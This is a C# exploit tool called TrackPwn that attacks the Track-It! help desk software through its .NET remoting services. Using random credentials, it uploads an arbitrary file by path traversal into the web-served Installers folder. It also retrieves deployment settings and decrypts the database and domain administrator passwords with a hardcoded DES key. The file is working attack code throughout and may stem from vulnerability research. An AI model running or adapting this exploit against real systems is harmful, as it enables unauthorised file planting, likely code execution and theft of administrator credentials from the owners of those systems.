﻿using System;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Tcp;
using System.Collections;
using TrackIt.Core.Credential;
using TrackIt.Core.FileStorage;
using TrackIt.Core.Configuration;
using TrackIt.Deployment.Common;
using TrackIt.Utility.Common.Remoting;
using System.IO;
using System.Security.Cryptography;
using System.Collections.Generic;
using System.Linq;

namespace TrackPwn
{
    class Program
    {
        public static void Main(string[] args)
        {
            if (args.Length < 3)
                Help();

            Hashtable configuration = new Hashtable() { { "requireSecurity", true } };
            int port = new Random().Next(1025, 65535);
            TcpChannel channel = (TcpChannel)RemotingHelper.RegisterRemoteChannel<TrackIt.Framework.
                ErrorHandling.BaseException>("tcp", port, configuration, false);

            if (args[0] == "UploadFile")
                UploadFile(args[1], args[2]);
            else if (args[0] == "GetPasswords")
                GetPasswords(args[1], args[2]);
            else
                Help();
        }


        private static void Help()
        {
            Console.WriteLine("Usage:");
            Console.WriteLine("\tTrackPwn.exe UploadFile <host:port> <inputFile>");
            Console.WriteLine("\tTrackPwn.exe GetPasswords <host:port> <outputFile>");
            System.Environment.Exit(-1);
        }


        public static void UploadFile(string hostAndPort, string filename)
        {
            Type requiredType = typeof(IFileStorageSecureDelegator);

            ClientCredentials creds = new ClientCredentials(
                Guid.NewGuid().ToString().Substring(0, 8), Guid.NewGuid().ToString().Substring(0, 8));
            FileContent file = new FileContent(filename);

            IFileStorageSecureDelegator remoteObj =
               (IFileStorageSecureDelegator)Activator.GetObject
            (requiredType, "tcp://" + hostAndPort + "/TrackIt.Core.FileStorageService");
            remoteObj.Create(creds, file, "IncidentRepository",
                GetTraversalPath(hostAndPort) + Path.GetFileName(filename));

            Console.WriteLine("Done. Your file should be in http://" + hostAndPort.Split(':')[0] + 
                "/TrackItWeb/Installers/" + Path.GetFileName(filename));
        }


        public static void GetPasswords(string hostAndPort, string filename)
        {
            string databaseType = "DatabaseType";
            string databaseServerName = "DatabaseServerName";
            string databaseName = "DatabaseName";
            string schemaOwner = "SchemaOwnerDatabaseUser";
            string databasePw = "EncryptedSystemDatabasePassword";
            string domainAdminName = "DomainAdminUserName";
            string domainAdminPw = "DomainAdminEncryptedPassword";

            Type requiredType = typeof(IConfigurationSecureDelegator);

            ClientCredentials creds = new ClientCredentials(
                Guid.NewGuid().ToString().Substring(0, 8), Guid.NewGuid().ToString().Substring(0, 8));

            IConfigurationSecureDelegator remoteObj =
               (IConfigurationSecureDelegator)Activator.GetObject
            (requiredType, "tcp://" + hostAndPort + "/TrackIt.Core.ConfigurationService");
            DeploymentValues values = remoteObj.GetProductDeploymentValues();

            using (FileStream fs = new FileStream(filename, FileMode.Create, FileAccess.Write))
            using (StreamWriter sw = new StreamWriter(fs))
            {
                if (values.DatabaseType.ToString() != null)
                    sw.WriteLine(databaseType + ": " + values.DatabaseType.ToString());
                if (values.DatabaseServerName != null)
                    sw.WriteLine(databaseServerName + " " + values.DatabaseServerName);
                if (values.DatabaseName != null)
                    sw.WriteLine(databaseName + " " + values.DatabaseName);
                if (values.SchemaOwnerDatabaseUser != null)
                    sw.WriteLine(schemaOwner + " " + values.SchemaOwnerDatabaseUser);
                if (values.EncryptedSystemDatabasePassword != String.Empty &&
                    values.EncryptedSystemDatabasePassword != null)
                    sw.WriteLine(databasePw + " " + DecryptString(values.EncryptedSystemDatabasePassword));
                if (values.DomainAdminUserName != null)
                    sw.WriteLine(domainAdminName + " " + values.DomainAdminUserName);
                if (values.DomainAdminEncryptedPassword != String.Empty &&
                    values.DomainAdminEncryptedPassword != null)
                    sw.WriteLine(domainAdminPw + " " + DecryptString(values.DomainAdminEncryptedPassword));
            }
            Console.WriteLine("Done. Credentials have been written to " + filename);
        }


        private static string DecryptString(string encrypted)
        {
            byte[] KeyAndIV = System.Text.Encoding.UTF8.GetBytes("NumaraTI");
            DESCryptoServiceProvider cryptoProvider = new DESCryptoServiceProvider();
            MemoryStream memoryStream = new MemoryStream
                    (Convert.FromBase64String(encrypted));
            CryptoStream cryptoStream = new CryptoStream(memoryStream,
                cryptoProvider.CreateDecryptor(KeyAndIV, KeyAndIV), CryptoStreamMode.Read);
            StreamReader reader = new StreamReader(cryptoStream);
            return reader.ReadToEnd();
        }


        private static string GetTraversalPath(string hostAndPort)
        {
            Type requiredType = typeof(IConfigurationSecureDelegator);

            ClientCredentials creds = new ClientCredentials(
                Guid.NewGuid().ToString().Substring(0, 8), Guid.NewGuid().ToString().Substring(0, 8));

            IConfigurationSecureDelegator remoteObj =
               (IConfigurationSecureDelegator)Activator.GetObject
            (requiredType, "tcp://" + hostAndPort + "/TrackIt.Core.ConfigurationService");
            DeploymentValues values = remoteObj.GetProductDeploymentValues();

            string fileStorageDir = values.FileStorageDataDirectory.ToString();
            string webDataDir = values.TrackItWebDataCacheDirectory.ToString();

            if (fileStorageDir == null || webDataDir == null)
            {
                Console.WriteLine("Could not calculate traversal path, falling back to the default");
                return "..\\..\\..\\..\\..\\Track-It! Web\\Web\\Installers\\";
            }
            else
            {
                string traversalPath = CalculateTraversal(webDataDir, fileStorageDir);
                Console.WriteLine("Calculated traversal path " + traversalPath);
                return traversalPath;
            }
        }


        // adapted from http://rosettacode.org/wiki/Find_common_directory_path#C.23
        private static string CalculateTraversal (string webDataDir, string fileStorageDir)
        {
            List<string> paths = new List<string>() { webDataDir, fileStorageDir };
            string separator = "\\";

            string commonPath = String.Empty;
            List<string> SeparatedPath = paths
                .First(str => str.Length == paths.Max(st2 => st2.Length))
                .Split(new string[] { separator }, StringSplitOptions.RemoveEmptyEntries)
                .ToList();

            foreach (string pathSegment in SeparatedPath.AsEnumerable())
            {
                if (commonPath.Length == 0 && paths.All(str => str.StartsWith(pathSegment)))
                {
                    commonPath = pathSegment;
                }
                else if (paths.All(str => str.StartsWith(commonPath + separator + pathSegment)))
                {
                    commonPath += separator + pathSegment;
                }
                else
                {
                    break;
                }
            }

            /* commonPath is the path is which common to webDataDir and fileStorageDir.
             * Now we need to:
             * 1 - calculate how many traversal sequences (..\) we need to use to get from the fileStorageDir to 
             * the base web directory (baseWebDir, which is not the same as webDataDir)
             * 2 - get baseWebDir from webDataDir
             * 3 - add Web\Installers to baseWebDir to get the final path were we are going to write our file
             * 
             */
            string traversalPath = String.Empty;

            // fileStorageDir is usually <basedir>\Track-It!\Track-It! Services\FileStorageData
            // add +1 because we are dumping the file in fileStorageDir\IncidentRepository\
            int fileStorageTraversal =
                fileStorageDir.Substring(commonPath.Length, fileStorageDir.Length - commonPath.Length)
                .Split('\\').Length + 1;

            for (int i = 0; i < fileStorageTraversal; i++)
                traversalPath += "..\\";

            // webDataDir is usually <basedir>\Track-It! Web\Cache\Track-It!\<serverName>
            // remove the common path path and get the name of the baseDataDir
            int webDataDirEnd = webDataDir.Substring(commonPath.Length + 1, webDataDir.Length - commonPath.Length - 1)
                .IndexOf('\\');
            string baseWebDir = webDataDir.Substring(commonPath.Length + 1, webDataDir.Length - commonPath.Length - 1)
                .Substring(0, webDataDirEnd);

            traversalPath += baseWebDir;
            traversalPath += "\\Web\\Installers\\";

            return traversalPath;
        }
    }
}
